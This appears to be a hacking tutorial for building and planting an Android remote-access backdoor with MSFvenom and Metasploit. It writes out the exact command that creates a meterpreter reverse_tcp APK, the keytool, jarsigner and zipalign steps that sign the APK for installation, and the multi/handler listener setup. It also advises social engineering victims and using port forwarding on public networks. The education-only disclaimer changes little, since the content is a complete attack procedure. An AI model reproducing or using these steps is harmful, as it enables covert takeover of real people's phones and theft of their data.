Hack an Android mobile device using MSFvenom and Metasploit framework. Here, we will use MSFvenom for generating payload and save as an apk file and setup listener to Metasploit framework. Once user/victim download and install the malicious apk then, an attacker can easily get back session on Metasploit. An attacker needs to do some social engineering to install apk on victim mobile.
We will demonstrate this by using following tools-
- Kali Linux/ BackBox/ Parrot
- Android emulator
- VMware or Virtual Box (virtual environment)
NOTE: This Lab is for education purpose only, BacKDoor not responsible for any illegal activity performed by the student.
Step 1: Starting Kali Linux /BackBox /Parrot
- From your VM, Start the Kali Linux and log in with root/toor (Userid/Password).
- Open a terminal prompt and make an exploit for Android emulator usingMSFvenom tool.
MSFvenom, it is a combination of msfpayload and msfencode. These tools are extremely useful for generating payloads in various formats and encoding these payloads using various encoder modules. Merging these two tools into a single tool just made sense. It standardizes the command line options, speeds things up a bit by using a single framework instance and handles all possible output formats. MSFvenom used to make a payload to penetrate the android.
By using MSFvenom we create a payload .apk file for this we use following command:
msfvenom –p android/meterpreter/reverse_tcp LHOST=10.0.2.5 LPORT=4444 R > /root/Desktop/backdoor.apk
-p = Payload to be used
LHOST = Localhost IP to receive a back connection or reverse connection (Check yours with ifconfig command).
LPORT= Localhost Port on which the connection listen for the victim (We set it to 4444).
R = Raw format (We select apk).
/root/Desktop/ (Location) = to save the file
Note: In this command, we have used the local address because we are in the local environment. To this in the public network, you have to enter your public address in LHOST and enable the port forwarding on the Router.
After Successfully created .apk file, we need to sign certificate because Android mobile devices are not allowing installing apps without the appropriately signed certificate. Android devices only install the signed .apk files.
We need to sign the apk file manually in Kali Linux using:
- Keytool (Preinstalled)
- jar signer (Preinstalled)
- zipalign (Need to Install)
To sign the apk file locally use these commands:
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname
jarsigner -verify -verbose -certs APPNAME.apk
Zipalign is not preinstalled in Kali Linux, so you have to install it first
zipalign -v 4 APPNAME.apk NEWAPPNAME.apk
Now we have signed our backdoor.apk file successfully and it can be run on any Android device. Our new filename is shooter.apk after the verification with zipalaign.
Now we have to start the listener on the Kali Linux /BackBox /Parrot machine with multi/handler exploit using Metasploit.
Now launch the exploit multi/handler and use Android payload to listen to the clients.
In Terminal: use exploit/multi/handler
Now set the options for payload, listener IP (LHOST) and listener PORT(LPORT). We have used localhost IP, port number 4444 and payload android/meterpreter/reverse_tcp while creating an APK file with MSFvenom.
Then we can successfully run the exploit and start listening to the android device. Now, the device installs our app on the device, and it gets penetrated with exploit
In Terminal: exploit
Now we transfer the shooter.apk file to the victim mobile device. In our environment, we are using an android emulator to penetrate the Android device. For sharing shooter.apk to the victim an email link or share the downloading link to the mobile device.
LHOST – is a local host where you need to get session after payload execute
RHOST – remote host or target host
LPORT- Local port where you want session
RPORT – Remote port or target port number
Exploit – executing exploit
Payload – activity to perform after successful exploit execution
Exploit – malicious code to exploit vulnerability